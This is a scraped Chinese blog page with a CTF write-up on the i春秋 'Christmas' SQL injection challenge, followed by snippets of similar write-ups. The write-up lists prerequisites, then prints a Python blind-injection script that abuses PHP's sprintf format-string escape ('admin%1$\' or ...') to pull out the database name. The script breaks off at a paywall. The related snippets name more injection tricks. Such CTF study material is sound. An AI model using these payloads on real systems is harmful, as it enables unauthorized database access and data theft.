"迎圣诞,拿大奖"赛题——SQLI

最新推荐文章于 2024-08-09 21:51:31 发布
最新推荐文章于 2024-08-09 21:51:31 发布
阅读量719 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/WQ_BCJ/article/details/85215662
版权

0x01

本题所需知识清单:

1.php sprintf()函数漏洞:https://blog.youkuaiyun.com/WQ_BCJ/article/details/85057447

2.布尔盲注基本playload及流程:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84592445

3.Burpsuit  Intruder暴力猜解:https://blog.youkuaiyun.com/snert/article/details/49749757

4.盲注python(2)脚本:

#coding:utf-8
import requests
import string

def boom():
    url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'
    s = requests.session()
    #会话对象requests.Session能够跨请求地保持某些参数,比如cookies,即在同一个Session实例发出的所有请求都保持同一个cookies,而requests模块每次会自动处理cookies,这样就很方便地处理登录时的cookies问题。
    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
    right = 'password error!'
    error = 'username error!'
    lens = 0
    i = 0
    #确定当前数据库的长度
    while True:
        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
        data={'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens=i
            break
        i+=1
        pass
    print("[+]length(database()): %d" %(lens))
    #确定当前数据库的名字
    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) +
最低0.47元/天 解锁文章
圣诞拿大奖” 活动 Web-SQLi
qq_34106499的博客
01-17 591
1. php中sprintf()函数漏洞原理及其利用; 2. mysql盲注语法及python脚本; 3. sqlmap的需要进一步学习;
国信安web安全——SQLi漏洞(一)
学习记录
02-28 663
一、熟悉SQL注入基础 (1)order by (2)Union (3)version() (4)database() (5)concat() (6)Concat_ws() (7)group_concat() (8)information_schema库 二、SQLi漏洞概念 SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于
圣诞拿大奖活动_SQLi(sprintf格式化字符)
a173262565的博客
04-08 176
目应该就是注入没跑了 先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户 拿常规注入语句试探一下admin' and 1=1%23,发生了报错 红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞 具体原理可以参考下面这篇文章 sprintf格式化字符串带来的注入隐患 先...
圣诞拿大奖”活动 SQLi
feng的博客
10-02 365
的新姿势就是利用sprintf格式化字符串漏洞来实现SQL注入。
圣诞拿大奖”活动------------SQLi
大方子
08-29 1437
========================================= 个人收获 1.sprintf 格式漏洞   =========================================   目     上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了   开始想尝试 万能密码 后来发现有过滤 尝试用...
CTF-“圣诞拿大奖”活动SQLi
路漫漫其修远
07-26 370
分值:200分 类型:Web目名称:SQLi 目内容:find the flag. 解步骤 进入链接,发现是个登录页面,没有注册的地方,填入admin&admin,提示password error! 分析报文,无异常 intruder一遍,发现username是admin%时报错 image.png 显然是sprintf的格式化问导致单引号逃逸 尝试各种字符串后,...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
sql注入——sqlilabs16-26
最新发布
aimnr的博客
08-09 1056
完整流程大概就是,先判断你有没有cookie,没有就登录,登录通过后设置cookie的uname字段值为用户明,然后二次提交后,再回到这个页面,这次有cookie,就直接到了上面这段代码,发现二次提交时cookie可以改,没有过滤,然后有一个查表的动作,后面有报错语句,利用报错注入。这里报错的意思(你不能在查询user表时,更改表中的数据在同一语句中) 因为这里的注入点时update语句。这里我们看到uname,passwd都有被过滤,但是他对响应信息有一个入库的操作,这里我们可以试试。
[复现]ichunqiu“圣诞拿大奖”活动-web-SQLi
baola的博客
11-14 281
sprintf字符串逃逸漏洞实现sql注入
SQLi 圣诞拿大奖”活动 复现
weixin_34015336的博客
05-11 178
目叫注入,先burp fuzz试一下 出来了一堆长度不一样的,还出了一个这个函数,这个函数大概问就是 逃逸问 比如输入%1$/' 他后端会把这个% 会吧1%/全部给吃掉,就导致单引号逃逸出来了 然后自己布尔盲注就上脚本跑就OK了 转载于:https://www.cnblogs.com/haozhizhi/p/10847167.html...
圣诞拿大奖——SQLI(附sprintf格式化字符串安全问超详解)
g1ut_t0ny的博客
07-03 339
"圣诞拿大奖"——SQLI 0x00目 结合目给出的“SQLI”与页面,正常思路是SQL注入,尝试用admin账户登陆,提示password error,证明有admin用户存在,那么就对username进行注入,尝试弱口令 0x01发现注入点 开始在username处进行常规注入,考虑万能密码,所以直接使用burpsuit的intruder跑一下,查看那些字母或者字符没有被过滤掉(waf字典),但发现带有%的response中返回长度不一样,查看回显发现提示 构造username=admin
[圣诞拿大奖] Sqli writeup
Flyour的博客
03-31 1091
Sqli 的writeup 拿到目看到的就是一个登录框,可以根据经验进行尝试一下用户名=amdin,密码=admin,得到的结果是password error。然后随便换一个其他的名字进行登录,发现得到的结果是username error。从这里可以看到响应结果会反映出是用户名出错,还是密码出错。 然后尝试进行注入,试了万能密码等注入,结果一直是username error。一开始我以为是w...
圣诞拿大奖”活动可恶的黑客
lovelj的博客
01-06 2045
话不多说,直接上图 1.每拿到这种目,我首先直接导出http 2.在文件最后看见一个TXT 3.打开看见这个 4.既然看见了就看看呗,搜索他 5.发现有三个,一个一个打开看呗(发正也是蒙)发现第二个里面有一段Unicode编码 6.那就把它转转看看呗 7.不错,出来了,那就提交呗 什么,居然不对,再看看,没错,复制的对了 那就再看看, 发现flag变f1ag了 在提交,ok ...
ctf-writeup-圣诞拿大奖-SQLi
key_nothing的博客
08-06 405
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
i春秋WEB CTF 2
cbhjerry的博客
11-16 2863
6:SQL,出人就告诉你这是个注入,有种别走! 解:这是一个存在sql注入漏洞的目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"<>"进行了过滤,因此可将以上3个关键字换成"SELEC<>T",&quo
i春秋 “百度杯”CTF比 九月场 SQLi writeup
weixin_43442029的博客
01-12 641
0x00 打开目链接后是一个空白页面,老规矩,去源代码找线索,于是就发现了提示login.php?id=1。 由目可以知道这一是SQL注入有关,那url的参数id应该就是注入点了。不过我试了好几次都没有特殊的回显,后来在网上搜到一些提示说真正的页面是l0gin.php。不得不说出人和解出来的人脑洞是真的大。(不过之后做了一些其他目后才发现这次比的出人很喜欢这样的命名方式,可能是这样想...
“百度杯”CTF比 九月场 SQLi思路
****的博客
10-15 1203
目简介 目名称:SQLi 目内容:后台获取flag线索思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
“百度杯”CTF比 九月场 目名称:SQLi 后台获取flag线索
qq_41168609的博客
07-23 854
“百度杯”CTF比 九月场 目名称:SQLi 后台获取flag线索思路 解思路 1. 具有SQL注入点连接: http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id 2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧 3. 判断字段个数 (SQL语句出错时,id原样输出) payload: l0gin.php?id=1%27%20order%20by%2
算法笔记(1)——编程过程中对已有变量的利用
GreenHand的博客
10-15 165
最近,学习算法的过程中遇到了leetcode上的Leetcode79:单词搜索这道,其实该的难度并不高,中等medium,解思路为BFS+DFS即可,可在最终运行时,发现自己的算法与给出的最佳答案之间存在巨大差异。 最佳答案的消耗为20ms,10.8MB,而我的算法消耗为400ms,113.8MB,时间及空间消耗均为最佳答案的10倍以上。如果我使用的是暴力破解,在解思路上与最佳方案存在差...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值